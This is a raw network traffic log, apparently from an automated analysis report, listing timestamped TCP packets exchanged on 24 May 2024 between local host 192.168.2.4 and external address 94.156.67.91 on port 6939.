May 24, 2024 05:09:50.387618065 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.387629032 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.387641907 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.387653112 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.387669086 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.387707949 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.390996933 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.391191959 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.391962051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.392085075 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.392246962 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.392388105 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.392644882 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.392654896 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.392692089 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.395750046 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.395766020 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.395829916 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.401344061 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.401478052 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.401515961 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.401818037 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.401983976 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.402163982 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.402174950 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.402187109 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.402198076 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.402229071 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.402265072 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.405307055 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.405603886 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.405616999 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.405657053 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.405797958 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.405957937 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.406143904 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.406156063 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.406166077 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.406202078 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.406779051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.406827927 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.407082081 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.413307905 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.413520098 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.413700104 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.413728952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.413786888 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.414093018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.414109945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.414122105 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.414175034 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.416171074 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.416191101 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.416271925 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.416331053 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.416392088 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.416634083 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.417021990 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.417041063 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.417100906 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.417623043 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.417680025 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.418277025 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.419761896 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.419925928 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.419986010 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.420140982 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.420324087 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.420434952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.420449018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.420502901 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.423068047 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.423084974 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.423156977 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.447721004 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.447804928 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.447884083 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.448088884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.448363066 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.448379993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.448499918 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.448856115 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.448873043 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.448925018 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.452491045 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.453547955 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.455977917 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.456099033 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.456250906 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.456402063 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.456415892 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.456427097 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.456578016 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.457169056 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.457184076 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.457227945 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.457705021 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.457720995 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.457731962 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.457747936 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.457763910 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.457792997 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.458473921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.458506107 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.458518028 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.458528042 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.458559990 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.459225893 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.459238052 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.459286928 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.459759951 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.459770918 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.459780931 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.459796906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.459809065 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.459836960 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.460582972 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.460597992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.460609913 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.460649014 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.461435080 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.461451054 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.461462975 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.461474895 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.461488008 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.461514950 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.462135077 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.462147951 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.462158918 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.462182999 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.462201118 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.462882996 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.462897062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.462908983 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.462920904 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.462948084 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.462963104 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.466252089 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.466269970 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.466331005 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.466511011 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.466790915 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.466804028 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.466962099 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.467312098 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.467325926 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.467336893 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.467359066 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.467386961 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.467859030 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.467869997 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.467880011 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.467892885 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.467926025 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.467953920 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.468607903 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.468622923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.468678951 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.469074965 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.471759081 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.471860886 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.471924067 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.472084045 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.472096920 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.472109079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.472261906 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.472263098 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.476120949 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.476149082 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.476202965 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.476217031 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.476555109 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.476639032 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.476651907 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.476716995 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.476716995 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.477093935 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.477109909 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.477123022 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.477184057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.477447033 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.477504015 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.480839968 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.481017113 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.481170893 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.481184959 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.481195927 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.481201887 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.481208086 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.481287003 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.481287956 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.481751919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.482183933 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.482320070 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.490463972 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.490572929 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.490618944 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.490835905 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.491086006 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.491137981 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.491369009 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.491380930 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.491416931 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.494162083 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.494178057 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.494220018 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.494297981 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.494308949 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.494446039 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.494575977 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.494817972 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.494913101 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.495106936 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.495121002 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.495160103 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.495594978 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.495605946 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.495639086 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.502218008 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.502312899 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.502454042 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.502602100 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.502846956 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.503119946 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.503132105 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.503263950 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.503263950 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.505052090 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.505069017 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.505122900 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.505182028 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.505433083 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.505484104 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.505691051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.505968094 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.505980015 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.505990028 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.506016016 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.506134987 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.506923914 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.508711100 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.508814096 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.508865118 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.509020090 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.509160995 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.509248018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.509464025 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.509475946 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.509489059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.509510040 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.509527922 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.511689901 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.536607027 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.536694050 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.536809921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.536962032 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.537122011 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.537201881 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.537492037 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.537503958 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.537655115 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.541591883 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.541603088 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.541762114 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.544730902 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.544806957 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.544840097 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.545042992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.545053959 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.545233011 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.545315027 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.545325994 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.545339108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.545362949 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.545399904 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.545913935 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.545929909 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.545979023 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.546120882 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.546355963 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.546367884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.546380043 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.546391964 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.546407938 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.546439886 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.547009945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.547020912 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.547032118 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.547045946 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.547066927 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.547099113 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.547811031 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.547821999 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.547864914 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.549196005 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.549206972 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.549217939 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.549248934 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.549278021 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.550544977 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.550559998 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.550609112 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.551929951 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.551942110 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.551985979 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.553275108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.553286076 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.553297997 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.553330898 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.555521011 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.555536032 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.555576086 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.556734085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.556745052 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.556756973 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.556896925 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.556896925 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.557435036 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.557446957 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.557456017 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.557502031 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.558188915 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.558202982 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.558213949 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.558253050 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.558286905 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.558929920 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.558943033 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.558994055 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.559674025 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.559685946 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.559695959 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.559730053 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.560408115 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.560419083 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.560456991 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.561125994 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.561136961 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.561182976 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.561870098 CEST	6939	49737	94.156.67.91	192.168.2.4
